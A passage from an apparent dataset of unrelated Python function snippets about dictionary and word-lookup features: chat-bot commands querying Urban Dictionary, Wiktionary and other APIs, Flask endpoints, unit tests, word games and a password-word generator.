json.dumps(rj)\n\n elif action == \"getSettings\":\n\n session = jo[\"session\"]\n\n rj['action'] = action\n rj['settings'] = settings.get_settings(session)\n rj['result'] = \"success\"\n rj['success'] = True\n\n result = json.dumps(rj)\n\n elif action == \"setSettings\":\n\n session = jo[\"session\"]\n\n data = jo[\"settings\"]\n settings.set_settings(session, data)\n\n rj['action'] = action\n rj['result'] = \"success\"\n rj['success'] = True\n\n result = json.dumps(rj)\n\n elif action == \"bulkAddVoc\":\n\n table_text = jo[\"text\"]\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n\n dbac.add_words_bulk(user_id, table_text)\n\n rj['action'] = action\n rj['result'] = \"success\"\n rj['success'] = True\n\n result = json.dumps(rj)\n\n else:\n # then we have a problem because we do not know the request and we need to throw an error\n log.log_error(\"unknown method for processing JSON\")\n xxx = 111\n\n return result", "def test_word_info_bad_request(self):\n word = \"defination of vitality \"\n rv = self.wordInfo(input_word=word)\n expected_output = {\n \"code\": 400,\n \"message\": \"A Term must be only a single word\"\n }\n response_data = json.loads(rv.get_data(as_text=True))\n\n self.assertEquals(rv.status_code, 400)\n self.assertEquals(response_data[\"code\"], expected_output[\"code\"])\n self.assertEquals(response_data[\"message\"], expected_output[\"message\"])", "def word():\n\n word = Word(random_word())\n # word = Word(\"arroyo\")\n\n word.speak()\n word.messup()\n l.debug(\"Displaying %s\", word.word)\n\n prons = sorted([word.word, word.word + \"-a\", word.word + \"-b\", word.word + \"-c\"], key=lambda x: random.random())\n\n return jsonify({\"word\": word.word, \"pron\": prons, \"correct\": prons.index(word.word)})", "def test_word_info_bad_word(self):\n word = \"hdiasudhisuahdiasushdiaushdiaushdiasuhdisauh\"\n rv = self.wordInfo(input_word=word)\n expected_output = {\n word: {\n \"frequency\": None,\n \"defination\": None,\n \"antonyms\": None,\n \"examples\": None,\n \"pronounciation\": None,\n \"synonyms\": None\n }\n }\n response_data = json.loads(rv.get_data(as_text=True))\n\n self.assertEquals(rv.status_code, 200)\n self.assertEquals(response_data[word][\"defination\"], expected_output[word][\"defination\"])\n self.assertEquals(response_data[word][\"antonyms\"], expected_output[word][\"antonyms\"])\n self.assertEquals(response_data[word][\"examples\"], expected_output[word][\"examples\"])\n self.assertEquals(response_data[word][\"frequency\"], expected_output[word][\"frequency\"])\n self.assertEquals(response_data[word][\"pronounciation\"], expected_output[word][\"pronounciation\"])\n self.assertEquals(response_data[word][\"synonyms\"], expected_output[word][\"synonyms\"])", "def post(self):\n data = request.json\n return check_spelling(data)", "def urban_dict(word):\n\n url = \"https://mashape-community-urban-dictionary.p.rapidapi.com/define\"\n\n querystring = {}\n\n querystring[\"term\"] = word\n\n headers = config.headers\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n print(response.text)", "async def dict(self, ctx, *keywords):\n\n if not keywords:\n embed = discord.Embed(title='{}:'.format(ctx.message.author.name),\n description='Did you tried `{}help dict` yet?'.format(self.config['prefix']),\n colour=0xf20006)\n a = await self.bot.say(embed=embed)\n await self.bot.add_reaction(a, self.emojiUnicode['error'])\n return\n if keywords:\n old_keyword = \" \".join(keywords)\n try:\n keywords = \"%20\".join(keywords)\n url = 'http://api.urbandictionary.com/v0/define?term={}'.format(keywords)\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n source = await response.json(encoding='utf8')\n\n source = json.dumps(source, indent=2)\n result = json.loads(str(source))\n embed = discord.Embed(title='{}:'.format(ctx.message.author.name),\n description='Your search tag was:\\n***`{}`***'.format(old_keyword),\n colour=0xf20006)\n embed.add_field(name='Word:', value='`{}`'.format(result['list'][0]['word']), inline=False)\n embed.add_field(name='Definition:', value='```{}```'.format(result['list'][0]['definition']), inline=False)\n embed.add_field(name='example:', value='```{}```'.format(result['list'][0]['example']), inline=True)\n embed.add_field(name='Author:', value='`{}`'.format(result['list'][0]['author']), inline=False)\n embed.add_field(name='Link:', value='{}'.format(result['list'][0]['permalink']), inline=False)\n embed.add_field(name='Likes:', value='\\U0001f44d `{}`'.format(result['list'][0]['thumbs_up']),\n inline=True)\n embed.add_field(name='Dislikes:', value='\\U0001f44e `{}`'.format(result['list'][0]['thumbs_down']),\n inline=True)\n\n\n a = await self.bot.say(embed=embed)\n await self.bot.add_reaction(a, self.emojiUnicode['succes'])\n except Exception as e:\n embed = discord.Embed(title='{}:'.format(ctx.message.author.name),\n description='Your search tag was:\\n***`{}`***\\n\\nNothing found :sailboat:'.format(old_keyword, self.config['prefix']),\n colour=0xf20006)\n a = await self.bot.say(embed=embed)\n await self.bot.add_reaction(a, self.emojiUnicode['warning'])", "def create_validation_function(name_of_slot):\n def validate_slot(\n self,\n value: Text,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> Dict[Text, Any]:\n \"\"\"Validate user input.\"\"\"\n\n if value.lower() in self.answers_db()[name_of_slot]:\n # validation succeeded, set the value of the slot to \n # user-provided value\n return {name_of_slot: value}\n else:\n # find the closest answer by some measure (edit distance?)\n choices = self.answers_db()[name_of_slot]\n answer = process.extractOne(value.lower(), choices)\n\n # check to see if distnace is greater than some threshold\n if answer[1] < 45:\n # if so, set slot to \"other\"\n return {name_of_slot: \"other\"}\n else:\n return {name_of_slot: answer[0]}\n \n return(validate_slot)", "def submit_definition():\n if request.method == \"POST\":\n game = mongo.db.games.find_one(\n {\"game_name\": request.form.get(\"game_name\")})\n user = mongo.db.users.find_one({\"username\": session[\"user\"]})\n today = date.today()\n submission_date = today.strftime(\"%Y/%m/%d\")\n definition = {\n \"term_header\": request.form.get(\"term_header\").upper(),\n \"game_fk\": game['_id'],\n \"short_definition\": request.form.get(\"short_definition\"),\n \"long_description\": request.form.get(\"long_description\", False),\n \"youtube_link\": request.form.get(\"youtube_link\", False),\n \"submitted_by\": user[\"_id\"],\n \"submission_date\": submission_date,\n \"rating\": 1,\n \"upvoted_by\": [user[\"_id\"]],\n \"downvoted_by\": []\n }\n mongo.db.terms.insert_one(definition)\n updateUserRating(definition, 1)\n flash(f\"Thank you, {session['user']}, for your submission\",\n category=\"success\")\n return redirect(url_for(\"get_terms\"))\n try:\n # Ensure that user is logged in before displaying page\n if session[\"user\"]:\n games = mongo.db.games.find().sort(\"game_name\", 1)\n return render_template(\"add_term.html\", games=games)\n except KeyError:\n # Redirect user to homepage if not logged in\n flash(Markup(\"Please <a href='login'>\"\n \"login</a> or <a href='register'>\"\n \"register</a> to add a new definition\"), category=\"error\")\n return redirect(url_for(\"get_terms\"))", "async def cmd_define(\n self,\n args: Args,\n src: Src,\n _language: str = None,\n _l: str = None,\n _etymology: int = None,\n _e: int = None,\n **_,\n ):\n if not args:\n return \"Wiktionary, the Free Dictionary\\nhttps://en.wiktionary.org/\"\n word = args[0]\n self.log.f(\"dict\", \"Query string: \" + word)\n\n async with src.channel.typing():\n which = _etymology or _e or 0\n\n ref = Define(word, _language or _l, which)\n url = \"https://en.wiktionary.org/wiki/\" + word\n if ref.valid:\n em = discord.Embed(color=0xF8F9FA)\n em.set_author(\n name=\"'{}' on Wiktionary ({} etymolog{} available)\".format(\n word, ref.alts, \"y\" if ref.alts == 1 else \"ies\"\n ),\n url=url,\n icon_url=\"https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/1122px-Wikipedia-logo-v2.svg.png\",\n )\n em.add_field(name=\"Etymology\", value=ref.etymology, inline=False)\n for definition in ref.definitions:\n em.add_field(\n name=\"`{}` ({}):\".format(word, definition[\"partOfSpeech\"]),\n value=\"\\n- \".join(\n [\n text\n for text in definition[\"text\"]\n if not re.search(r\"^\\(.*vulgar.*\\)\", text.lower())\n ]\n ),\n inline=False,\n )\n\n return em\n else:\n raise CommandOperationError(\"No definition found.\")", "def process_action(action, params, context):\n if action == 'define_word':\n word = params.get('word')\n if word is None:\n return make_simple_reply('I do not know this word')\n word_id = normalize_word(word)\n word_model = ndb.Key('Word', word_id).get()\n if word_model is not None:\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n return generate_definition_reply(word_model)\n \n word_model = Word()\n word_model.learned = False\n word_model.word = word\n word_model.key = ndb.Key('Word', word_id)\n if not get_word_definition(word_model):\n return make_simple_reply('I do not know this word')\n else:\n word_model.practice_count = 1\n word_model.put()\n return generate_definition_reply(word_model)\n \n elif action == 'practice':\n keys = Word.query().filter(Word.learned == False).fetch(keys_only=True)\n selected_word_key = random.sample(keys, 1)[0]\n reply = make_simple_reply(\n 'How about %s! Do you remember it?' % selected_word_key.get().word)\n reply['context'] = [{\n 'name': 'practice',\n 'lifespan': 2,\n 'parameters': {'word_id': selected_word_key.id()}\n }]\n return reply\n \n elif action == 'practice_known':\n # User knows this word. Mark it as learned\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model.learned = True\n word_model.put()\n reply = make_simple_reply('OK, I will not ask this word again')\n reply['context'] = reset_context\n return reply\n \n elif action == 'practice_unknown':\n # User does not know this word. Return its definition\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n reply = generate_definition_reply(word_model)\n reply['context'] = reset_context\n return reply\n \n return make_simple_reply('I did not get that')", "async def ud(self,word):\r\n defs = ud.define(word)\r\n for d in defs:\r\n await self.bot.say(d)", "def getWord(wordType):\n if (wordType == ADJECTIVE) or (wordType == ADJECTIVE):\n newWord = input('Enter an ' + wordType.lower() + \":\\n\")\n return newWord\n else:\n newWord = input('Enter a ' + wordType.lower() + \":\\n\")\n return newWord", "def choose_word():\n pass", "def define(update, context):\n word = update.message.text\n output = make_output(word)\n if output:\n response_message = output\n else:\n response_message = 'Sorry, I was unable to complete that request.'\n context.bot.send_message(\n chat_id=update.effective_chat.id, text=response_message)", "def spellcheck():\n text = request.args.get('text', '')\n words = {}\n for word in text.split():\n words[word] = Word(word).spellcheck()\n return jsonify(**words)", "async def define(self, interaction: Interaction, args: str):\n baseurl = \"https://www.merriam-webster.com/dictionary/\"\n output = args\n await interaction.response.send_message(baseurl + output)", "def is_validword(word, hand, word_list1):\n # TO DO ... <-- Remove this comment when you code this function\n word_list = []\n cnt_1 = 0\n for i in word:\n word_list += i.split(\",\")\n for i in word_list:\n if i in hand.keys():\n cnt_1 += 1\n if cnt_1 == len(word) and word in word_list1:\n score = get_word_score(word, n_num)\n update_hand(hand, word)\n else:\n print(\"Invalid Word\")", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = \"Welcome to the Merriam-Webster Dictionary. What word can I look up for you?\"\n reprompt = \"You can say: definition of word, example of word, or synonym of word.\"\n\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def create(self, request, *args, **kwargs):\n message = self.check_word_id()\n if message is not None:\n return Response(message, status=status.HTTP_400_BAD_REQUEST)\n return super(Definition, self).create(request, *args, **kwargs)", "async def jisho(self, ctx, word: str):\r\n search_args = await self.dict_search_args_parse(ctx, word.lower())\r\n if not search_args:\r\n return\r\n limit, query = search_args\r\n message = urllib.parse.quote(query, encoding='utf-8')\r\n url = \"http://jisho.org/api/v1/search/words?keyword=\" + message\r\n async with self.session.get(url) as response:\r\n data = await response.json()\r\n try:\r\n messages = [self.parse_data(result) for result in data[\"data\"][:limit]]\r\n except KeyError:\r\n return await ctx.send(\"I was unable to retrieve any data\")\r\n try:\r\n await ctx.send('\\n'.join(messages))\r\n except discord.HTTPException:\r\n await ctx.send(\"No data for that word.\")", "def urban_dictionary (self, xmpp_message, room, nick, term):\n\n # term is required.\n if not term:\n return\n\n URL = \"http://api.urbandictionary.com/v0/define?term=%s\"\n HDRS = { \"Host\" : \"api.urbandictionary.com\" }\n\n try:\n data = requests.get(URL % requests.utils.quote(term), headers=HDRS).content\n data = simplejson.loads(helpers.sanitize(data))\n except:\n return \"(facepalm) sorry. I encounted an error.\"\n\n # pick a random definision.\n try:\n ud = random.choice(data[\"list\"])\n return [ud[\"permalink\"], \"%s\\nExample: %s\" % (ud[\"definition\"], ud[\"example\"])]\n except:\n return \"No definition found for '%s'\" % term", "def GetWord(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def getWord(self, word, useCanonical=None, includeSuggestions=None, ):\n\n # Parse inputs\n resourcePath = '/word.{format}/{word}'\n resourcePath = resourcePath.replace('{format}', 'json')\n method = 'GET'\n\n queryParams = {}\n headerParams = {}\n\n queryParams['useCanonical'] = self.apiClient.toPathValue(useCanonical)\n queryParams['includeSuggestions'] = self.apiClient.toPathValue(includeSuggestions)\n\n\n if word != None:\n resourcePath = resourcePath.replace('{word}', word)\n\n\n # Make the API Call\n response = self.apiClient.callAPI(resourcePath, method, queryParams,\n None, headerParams)\n if not response:\n return None\n\n # Create output objects if the response has more than one object\n responseObject = self.apiClient.deserialize(response,\n model.WordObject.WordObject)\n return responseObject", "async def ud(self, ctx, *, string):\n\n link = '+'.join(string.split())\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://api.urbandictionary.com/v0/define?term=\" + link) as resp:\n json_data = await resp.json()\n definition = json_data['list']\n\n if len(definition) > 1:\n p = []\n number = 0\n for i in definition:\n number += 1\n p.append(func.ud_embed(i, number, len(definition)))\n await SimplePaginator(extras=p).paginate(ctx)\n else:\n await ctx.send(embed=func.ud_embed(definition[0], 1, 1))", "def query_word(self, word):\n raise NotImplementedError", "def createSpecial():\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n response = input(\"Enter response:\")\r\n api = input(\"Enter api (e.g. 'internet'):\")\r\n command = input(\"Enter command (e.g. 'search'):\")\r\n data = input(\"Enter data (as required by the API):\")\r\n special = api+\":\"+command+\":\"+data\r\n new_state = State(searchNextId(), words={}, origin=CurrentInput, special=special)\r\n new_state.updateStateIncoming(CurrentState.id)\r\n new_state.updateStateResponse(response)\r\n new_state.updateStateWords(CurrentInput)\r\n writeState(new_state)\r\n print(\"I'm smarter now, try me again.\")", "def get_word_definition(word_model):\n word_id = word_model.key.string_id()\n req = urllib2.Request(app.wordlist_config.oxford_url_pattern % word_id)\n req.add_header('app_id', app.wordlist_config.oxford_app_id)\n req.add_header('app_key', app.wordlist_config.oxford_app_key)\n\n try:\n res = urllib2.urlopen(req)\n except urllib2.HTTPError as e:\n print('Oxford dictionary returned with error code %s' % e.code,\n file=sys.stderr)\n return False\n \n res_json = json.load(res)\n try:\n word_model.definition = \\\n res_json['results'][0]['lexicalEntries'][0]['entries'][0]['senses'][0]['definitions'][0]\n except (KeyError, TypeError):\n print('Invalid dictionary response', file=sys.stderr)\n print(json.dumps(res_json, indent=4), file=sys.stderr)\n return False\n \n try:\n pronunciations = res_json['results'][0]['lexicalEntries'][0]['pronunciations']\n audio_url = None\n for p in pronunciations:\n if 'audioFile' in p:\n audio_url = p['audioFile']\n break\n if audio_url is None:\n return True\n\n # download mp3 file\n audio_file = urllib2.urlopen(audio_url).read()\n # upload it to Google cloud\n gc_audio_file_name = 'audio/%s.mp3' % word_model.key.string_id()\n gc_audio_file_object = cloudstorage.open(\n '/' + app.wordlist_config.cloud_storage_bucket +\n '/' + gc_audio_file_name, 'w')\n gc_audio_file_object.write(audio_file)\n gc_audio_file_object.close()\n word_model.audio = gc_audio_file_name\n \n except (KeyError, TypeError, urllib2.URLError, cloudstorage.Error):\n word_model.audio = None\n\n return True", "def recieving_name_request(name):\n name = name.lower()\n\n global dictionary\n global no_lines\n global need_lines\n global bad_lines\n global gather_all_PU_lines_for_a_name\n global add_PUL_to_database\n\n if name in no_lines:\n return 'give general' #change\n else:\n if name in dictionary:\n return pick_PULs_from_database(dictionary[name])\n else:\n dictionary[name]={}\n names_PUL_from_internet = gather_all_PU_lines_for_a_name(name)\n if not names_PUL_from_internet:\n no_lines.append(name)\n need_lines.append(name)\n return 'give general'\n else:\n for PUL in names_PUL_from_internet:\n add_PUL_to_database(name, PUL, dictionary)\n if len(dictionary[name]) <=3:\n need_lines.append(name)\n return pick_PULs_from_database(dictionary[name])", "def autocomplete_possibilities():\n try:\n # get data sent by client\n typed_input = request.args.get('q')\n print(' ')\n print('\\n------ getting autocomplete_possibilities ------')\n print(f\"recived: input:{typed_input}\")\n\n # call the google API\n results = gmaps.places_autocomplete(typed_input)\n data = [\n {'value': r['place_id'], 'text': r['description']}\n for r in results\n ]\n\n # Pass data to the front end\n print(f'returning: {data}')\n return jsonify(data)\n\n except Exception as e:\n print(\"AJAX excepted \" + str(e))\n return str(e)", "def randomWords(self, input_word):\n input_word = json.dumps(input_word)\n return self.app.post('/words/1.0/random', data=input_word, follow_redirects=True,headers=self.headers)", "def urbandic(self, irc, msg, args, req):\n dict = {' ':'+'}\n req = self.replace_all(req, dict)\n if req:\n url = 'http://www.urbandictionary.com/define.php?term=' + req\n else:\n url = 'http://www.urbandictionary.com/random.php'\n try:\n website = urllib2.urlopen(url)\n except urllib2.HTTPError, e:\n irc.reply('A problem occured. Please try again.')\n return\n soup = BeautifulSoup(website,\n convertEntities=BeautifulSoup.HTML_ENTITIES)\n td_word = soup.findAll(name='td',\n attrs={'class':'word'},\n limit=1)\n div_def = soup.findAll(name='div',\n attrs={'class':'definition'},\n limit=1)\n for t in td_word:\n if t.string:\n word = string.replace(t.string, '\\n', '')\n irc.reply('Word: ' + word, prefixNick=False)\n else:\n irc.reply('No word found.')\n return\n defn = ''\n for d in div_def:\n for c in d.contents:\n if c.string:\n defn += c.string\n irc.reply('Def.: ' + defn, prefixNick=False)", "def __check_word__(self, word):\n self.directionValue, self.isDirection = self.__isDirection__(word.lower())\n self.verbValue, self.isVerb = self.__isVerb__(word.lower())\n self.stopValue, self.isStop = self.__isStopWord__(word.lower())\n self.nounValue, self.isNoun = self.__isNoun__(word.lower())\n self.numberValue, self.isNumber = self.__isNumber__(word.lower())\n\n if self.isDirection:\n return self.directionValue\n elif self.isVerb:\n return self.verbValue\n elif self.isStop:\n return self.stopValue\n elif self.isNoun:\n return self.nounValue\n elif self.isNumber:\n return self.numberValue\n else:\n return ('error', word)", "def wiktionary(bot, trigger):\n word = trigger.group(2)\n if word is None:\n bot.reply('You must tell me what to look up!')\n return\n\n _etymology, definitions = wikt(word)\n if not definitions:\n # Cast word to lower to check in case of mismatched user input\n _etymology, definitions = wikt(word.lower())\n if not definitions:\n bot.reply(\"Couldn't get any definitions for %s.\" % word)\n return\n\n result = format(word, definitions)\n if len(result) < 300:\n result = format(word, definitions, 3)\n if len(result) < 300:\n result = format(word, definitions, 5)\n\n bot.say(result, truncation=' […]')", "def define(word: str):\n try:\n r = requests.get(\"http://www.urbandictionary.com/define.php?term={}\".format(word)) # goes to link for word\n soup = BeautifulSoup(r.content, features=\"html.parser\") # sets up soup\n def_header = \"**\" + soup.find(\"div\", attrs={\"class\": \"def-header\"}).text.replace(\"unknown\",\n \"\") + \"**\"\n # header is the word we are defining\n meaning = soup.find(\"div\", attrs={\"class\": \"meaning\"}).text # gets the definition\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n meaning = meaning.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n meaning = \"```\" + meaning + \"```\"\n example = soup.find(\"div\", attrs={\"class\": \"example\"}).text # gets the example\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n example = example.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n output = def_header + \": \" + meaning + \" \" + \"\\nExample: \" + \"```\" + example + \"```\" # output string\n output = output.replace(\"&apos\", \"'\") # replaces weird formatting of ' from original\n return output # returns the word, defintion, and example\n except AttributeError:\n return \"No results\"", "def get_secret_word():\n pass", "def addWord(self, word: 'str') -> 'None':\n p=self.dictword\n for s in word:\n if s not in p:\n p[s]={}\n p=p[s]\n else:\n p=p[s]\n p['#']=None", "def add_word(self, word, data=None):\n self.__word = word\n self.__data = data", "def learn_new_defn(word: str) -> None:\n\n # Retrieve the Word object from Charm's book\n word = acc.book[hash(word)]\n\n # Do not inherently ask to redefine\n if word.defn != '':\n return\n\n # Prompt for definition\n res = input(\"Define \\'\" + str(word) + \"\\'?\")\n\n if negative(res):\n # Do not define if response is negative\n return\n\n # Notify and define\n post_query(\"Defined \\'\" + str(word) + \"\\' as \\'\" + res + \"\\'\")\n word.define(res)", "def get_definition(request):\n result = \"No result\"\n if request.method == \"GET\":\n word = request.GET.get(\"get_word\", None)\n syns = wn.synsets(word)\n if len(syns) > 0:\n result = syns[0].definition()\n else:\n result = \"no result for word:\" + word\n return render(request, \"blog/re_definition.html\", {'result': result, 'word': word})", "def CreateWord(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def validate(self, dispatcher, tracker, domain):\n requested_slot = tracker.get_slot(\"requested_slot\")\n if not requested_slot or requested_slot != \"suggestion\":\n return [SlotSet(\"requested_slot\", \"suggestion\")]\n return [SlotSet(\"suggestion\", tracker.latest_message['text'])]", "def create_request(self):\n try:\n stock_name, request = self.text.split(\" \")\n print(stock_name)\n print(request)\n if request in run_commands.keys():\n endpoint: str = run_commands.get(request).get('endpoint')\n url_maker: str = f\"stocks/{stock_name}{endpoint}\"\n print(url_maker)\n response: Optional[str, Dict[str, str]] = self.make_request(method=\"GET\", endpoint=url_maker)\n if isinstance(response, dict):\n print(response)\n api_response: Dict[str, str] = slack_response.stock_info(stock_name, response.get(\"message\"))\n print(api_response)\n return api_response\n else:\n return \"release in progress\"\n except ValueError as e:\n return slack_response.help_response()\n except KeyError as e:\n return slack_response.help_response()", "def process_input(self, word):\n return", "def add_word(self, request):\n if Word.query(Word.word == request.word).get():\n raise endpoints.ConflictException('That word is in the list!')\n else:\n word_list = []\n temp = request.word.upper()\n for i in temp:\n if i == \" \" or i < 'A' or i > 'Z':\n raise endpoints.BadRequestException(\n 'Please Enter One Word!')\n else:\n word_list.append(i)\n w = Word(word=request.word, word_list=word_list)\n w.put()\n return StringMessage(message='Added %s to the list!' % request.word)", "def filter(self, word):\n \n word = word.lower()\n try:\n self.engine.fetch(word)\n except socket.error:\n raise LemmaAPIError\n part_of_speeches = self.engine.part_of_speeches\n\n \n self.basic_form = word\n for part in part_of_speeches:\n if part == 'verb':\n if self.engine.is_verb_conjugated():\n if not self.conEngine.is_verb_regular(word, self.engine.get_basic_verb()):\n self.basic_form = self.engine.get_basic_verb()\n return word\n else:\n self.basic_form = self.engine.get_basic_verb()\n\n elif part == 'noun':\n if self.engine.is_noun_plural():\n if not self.conEngine.is_noun_regular(word, self.engine.get_singular_noun()):\n self.basic_form = self.engine.get_singular_noun() \n return word\n else:\n self.basic_form = self.engine.get_singular_noun()\n\n return self.basic_form", "def uber_types_handler(result,server_token):\n prodtypes_res = {}\n if result is not None and result!= {}:\n arguments = result.get(\"parameters\")\n\n # Establising Uber Session using UBER python SDK\n session = Session(server_token=server_token)\n uber_client = UberRidesClient(session)\n\n #Translating Street Address to Geo Coordinates\n soruce_address = arguments.get(\"source\")\n dest_address = arguments.get(\"destination\")\n geo = translate_to_geolocation(soruce_address)\n destGeo = translate_to_geolocation(dest_address)\n\n products = get_products(geo.get(\"lat\"),geo.get(\"lng\"),uber_client)\n prod_names = [prod.get(\"display_name\") for prod in products];\n\n speech = \"Which Uber type do you prefer? You can choose from \"\n text = \"Select a Uber type. Available options for your location are \"\n options = \", \".join(prod_names)\n print(options)\n\n context = get_context(result,USER_CONTEXT.NAME)\n context_parameters = context.get(\"parameters\")\n ##context_dic = json.loads(context)\n context_parameters[USER_CONTEXT.START_LAT]= geo.get(\"lat\")\n context_parameters[USER_CONTEXT.START_LNG]= geo.get(\"lng\")\n context_parameters[USER_CONTEXT.END_LAT] = destGeo.get(\"lat\")\n context_parameters[USER_CONTEXT.END_LNG] = destGeo.get(\"lng\")\n\n prodtypes_res = prepare_webhookresponse(text=text+options,speech= speech+options,context=context)\n\n return prodtypes_res", "async def query(cls, session: ClientSession,\n word: str) -> Union[None, 'UrbanDefinition']:\n async with session.get(UD_ENDPOINT.format(\n utils.urlescape(word))) as resp:\n json = await resp.json()\n\n # no results :(\n if json['result_type'] == 'no_results':\n return None\n\n result = json['list'][0]\n return cls(**result)", "def get_def_page(word):\n import urllib\n url = \"http://www.dictionary.com/cgi-bin/dict.pl?term=%s\" % word\n fo = urllib.urlopen(url)\n page = fo.read()\n return page", "def test_word_info(self):\n word = \"vitality\"\n rv = self.wordInfo(input_word=word)\n expected_output = {\n word: {\n \"frequency\": \"975\",\n \"defination\": \"{'Noun': ['an energetic style', 'a healthy capacity for vigorous activity', '(biology', 'not physical or chemical', 'the property of being able to survive and grow']}\",\n \"antonyms\": \"['enervation', 'inactivity', 'lethargy', 'weakness', 'lack']\",\n \"examples\": \"{1: 'And finally, both Lord Robertson and Secretary of State Powell pointed to what they called the vitality and the relevance of NATO, and said any damage done to the reputation of NATO over the last couple weeks can quite, in their words, be easily overcome.', 2: \\\"Professor Huxley himself has told us that he lived in 'the hope and the faith that in course of time we shall see our way from the constituents of the protoplasm to its properties,' _i. e._ from carbonic acid, water, and ammonia to that mysterious thing which we call vitality or life -- from the molecular motion of the brain to Socratic wisdom,\\\", 3: 'The strongest, the most amply endowed with what we call vitality or power to live, win.', 4: 'But the thought that it is mechanics and chemistry applied by something of which they as such, form no part, some agent or principle which we call vitality, is welcome to us.', 5: '\\\"The Indian savages,\\\" said Margrave, sullenly, \\\"have not a health as perfect as mine, and in what you call vitality -- the blissful consciousness of life -- they are as sticks and stones compared to me.\\\"'}\",\n \"pronounciation\": \"V AY0 T AE1 L AH0 T IY0\",\n \"synonyms\": \"['vigor', 'continuity', 'spunk', 'strength', 'verve']\"\n }\n }\n response_data = json.loads(rv.get_data(as_text=True))\n\n self.assertEquals(rv.status_code, 200)\n self.assertEquals(response_data[word][\"defination\"], expected_output[word][\"defination\"])\n self.assertEquals(response_data[word][\"antonyms\"], expected_output[word][\"antonyms\"])\n self.assertEquals(response_data[word][\"examples\"], expected_output[word][\"examples\"])\n self.assertEquals(response_data[word][\"frequency\"], expected_output[word][\"frequency\"])\n self.assertEquals(response_data[word][\"pronounciation\"], expected_output[word][\"pronounciation\"])\n self.assertEquals(response_data[word][\"synonyms\"], expected_output[word][\"synonyms\"])", "def get_box(req):", "def GetWordData(cls, request, response, func):\n word_list = request.get(\"word_list\", '')\n if not word_list:\n raise endpoints.BadRequestException(\"No word list was specified\")\n entity = WordList.get_by_id(word_list)\n if not entity:\n raise endpoints.NotFoundException(\"Word list {} was not found\".format(word_list))\n words = entity.words\n futures = {}\n foundWords = []\n notFoundWords = []\n for word in words:\n futures[word] = func(word)\n for word in futures:\n try:\n futures[word].get_result()\n foundWords.append(word)\n except Exception as e:\n notFoundWords.append(word)\n message = str(e)\n if len(message) < 100:\n response.write(\"<p>error when adding word {}: {}</p>\".format(word, message))\n else:\n response.write(\"<p>error when adding word {}: error too big to display\".format(word))\n response.write(\"<h1>Total Words Processed = {}</h1>\".format(len(words)))\n response.write(\"<h2>Successfully Added = {}</h2>\".format(len(foundWords)))\n response.write(\"<h2>Words with errors = {}</h2>\".format(len(notFoundWords)))", "def guess_word(self):\r\n guess = input(\"# Guess the Word :\")\r\n if not guess:\r\n print(\"Please enter a valid word.\")\r\n else:\r\n if game_instance.check_word(guess):\r\n print(\"Correct! You did it Champ!\")\r\n game_instance.calculate_score(self.frequency)\r\n self.instances.append(game_instance)\r\n obj.create_new_game()\r\n else:\r\n print(\"Wrong Guess. Try Again!\")", "def complete(index, prefix, text, field='form_suggest', size=100):\n response = { 'prefix': prefix, 'text':text, 'length': 0, 'complete': [] }\n \n key = \"word_completion\"\n body = {\n key: {\n \"text\": text,\n \"completion\": {\n \"field\": field,\n \"size\": size,\n \"context\": {\n \"prefix\": prefix\n }\n }\n }\n }\n res = index.suggest(body=body)\n #return res\n if key in res and res[key][0].get('length', 0) :\n complete = []\n \n options = res[key][0]['options']\n max_score = 0\n for opt in options:\n complete.append( {\n \"graph\": opt['payload']['graph'],\n \"lang\": opt['payload']['lang'],\n \"pos\": opt['payload']['pos'],\n \"form\": opt['payload']['form'],\n \"score\": opt['score'],\n \"output\": opt['text']\n })\n max_score = max(max_score, opt['score'])\n\n for v in complete:\n score = v['score']/max_score\n if text == v['form']:\n score +=1\n v['score'] = score\n\n complete.sort(key=lambda x : x['score'], reverse=True)\n \n response['length'] = len(complete)\n response['complete'] = complete\n response['size'] = size\n \n return response", "def random_words_func_post():\n data = request.get_json()\n\n password_length = data['passwordLength']\n mappings = data['mappings']\n case_mode = data['rwCase']\n\n max_word_length = db_session.query(Word.length, func.max(Word.length)).first()[0]\n min_word_length = db_session.query(Word.length, func.min(Word.length)).first()[0]\n\n used_words = __choose_random_words(max_word_length=max_word_length,\n min_word_length=min_word_length,\n password_length=password_length)\n\n password_words = apply_mappings(mappings, used_words)\n password_words = apply_case(password_words=password_words, case_mode=case_mode)\n\n password = ''.join(password_words)\n return jsonify({\n 'passwordWords': password_words,\n 'crackingTime': count_cracking_time(password),\n 'usedWords': 